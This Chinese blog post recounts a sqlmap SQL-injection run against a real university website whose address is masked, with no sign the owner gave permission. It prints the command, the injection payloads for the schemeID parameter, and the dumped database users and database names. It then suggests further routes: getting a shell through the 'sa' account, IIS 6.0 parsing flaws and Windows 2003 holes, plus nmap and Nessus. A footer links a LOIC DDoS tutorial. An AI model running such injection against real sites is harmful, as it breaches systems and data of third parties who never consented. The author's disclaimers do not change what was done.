对某高校官方网站的一次简单的注入检测(sqlmap)

附图一张(来自深信服微电影《一个黑客的自白》):

5243349bfc84b4cc4f04760dc43372aa.png - 大小: 365.8 KB - 尺寸: 700 x 394 - 点击打开新窗口浏览全图

声明:本次测试只是对页面进行一个sql注入的检测,并无恶意。检测过程中点到为止,不做过多的深入。

测试目标:http://www.****.com

测试环境:kali linux 1.0.5

使用软件:sqlmap

sql注入地址:http://www.****.com/......ID=10

OK,开始注入

开始测试之前我们需要对sqlmap有一定的了解,这个软件功能非常强大,参数设置也非常的丰富,完全掌握需要一定的时间和实践。博主这次进行的测试所使用的命令是非常简单的。这里给出一个sqlmap的简单基础教程,来自wooyun.org的知识库。

sqlmap用户手册:http://drops.wooyun.org/tips/401

对sqlmap有一定了解之后我们就可以开始了。

我们今天使用sqlmap所用到的参数是--dbs 和 --users

--dbs #列出所有数据库

--users #列出所有用户

OK,咱们废话也不多说,开始吧,这里使用一条命令就可以了

sqlmap -u http://www.****.com/......ID=10 --dbs --users
好的,让程序飞一会儿,咱们喝杯咖啡吧:P
执行完毕之后我们来看下日志:
root@phantom:~# sqlmap -u http://www.****.com/......ID=10 --dbs --users

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:45:24

[00:45:24] [INFO] resuming back-end DBMS 'microsoft sql server' 
[00:45:25] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: schemeID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: schemeID=10 AND 6188=6188

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: schemeID=-7631 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(103)+CHAR(108)+CHAR(111)+CHAR(113)+CHAR(83)+CHAR(86)+CHAR(97)+CHAR(101)+CHAR(122)+CHAR(65)+CHAR(106)+CHAR(115)+CHAR(65)+CHAR(89)+CHAR(113)+CHAR(97)+CHAR(104)+CHAR(97)+CHAR(113),NULL-- 

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: schemeID=10; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: schemeID=10 WAITFOR DELAY '0:0:5'--
---
[00:45:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[00:45:25] [INFO] fetching database users
[00:45:25] [INFO] the SQL query used returns 6 entries
[00:45:25] [INFO] resumed: "mjjy_r"
[00:45:25] [INFO] resumed: "mjrg"
[00:45:25] [INFO] resumed: "mjwebex"
[00:45:25] [INFO] resumed: "MyName"
[00:45:25] [INFO] resumed: "sa"
[00:45:25] [INFO] resumed: "zhijiao"
database management system users [6]:                                          
[*] mjjy_r
[*] mjrg
[*] mjwebex
[*] MyName
[*] sa
[*] zhijiao

[00:45:25] [INFO] fetching database names
[00:45:25] [INFO] the SQL query used returns 11 entries
[00:45:25] [INFO] resumed: "cyyDB"
[00:45:25] [INFO] resumed: "master"
[00:45:25] [INFO] resumed: "MJSCHOOL"
[00:45:25] [INFO] resumed: "model"
[00:45:25] [INFO] resumed: "msdb"
[00:45:25] [INFO] resumed: "NewParty"
[00:45:25] [INFO] resumed: "ReportServer"
[00:45:25] [INFO] resumed: "ReportServerTempDB"
[00:45:25] [INFO] resumed: "tempdb"
[00:45:25] [INFO] resumed: "test_mjrg"
[00:45:25] [INFO] resumed: "zhijiao"
available databases [11]:                                                      
[*] cyyDB
[*] master
[*] MJSCHOOL
[*] model
[*] msdb
[*] NewParty
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test_mjrg
[*] zhijiao

[00:45:25] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.****.com'

[*] shutting down at 00:45:25

root@phantom:~# 
好的,安全测试,点到为止。咱们稍微对上面的结果看下。在用户里面我们发现开启了sa账户,对此,我表示“呵呵”。sa的危害挺大的,各种拿shell都很方便,我这不深入。 以下纯属猜测:

目标服务器是IIS 6.0,可能存在文件解析漏洞。

目标主机系统是2003,可能存在各种windows安全漏洞

如果想更清楚的了解目标主机的安全状况,可以使用nmap对目标主机进行一个扫描,来收集更加详细的服务器信息。当然nessus这个神器也少不了,分析目标主机的安全信息。

这次仅对目标主机进行了一个简单的sql注入检测,没有进行深入的渗透测试研究。

321b7c017af7bedf4c712682ca4ea344.png - 大小: 246.63 KB - 尺寸: 700 x 394 - 点击打开新窗口浏览全图
注意:请不要在非授权情况下对网站进行安全测试,否则后果自负。

如果您觉得文章有帮助到您,请到 https://www.92ez.com/index.php?action=show&id=23403 进行打赏/捐赠,谢谢!
如果您觉得文章有帮助到您,请 使劲戳这里 进行打赏/捐赠,谢谢!
本文链接:https://www.92ez.com/?action=show&id=7
提示:技术文章有一定的时效性,请先确认是否适用你当前的系统环境。

上一篇: Arduino 使用315Mhz无线模块通信并用1602液晶显示
下一篇: KALI linux 下安装并使用压力测试工具LOIC(DDOS攻击工具)

访客评论
目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):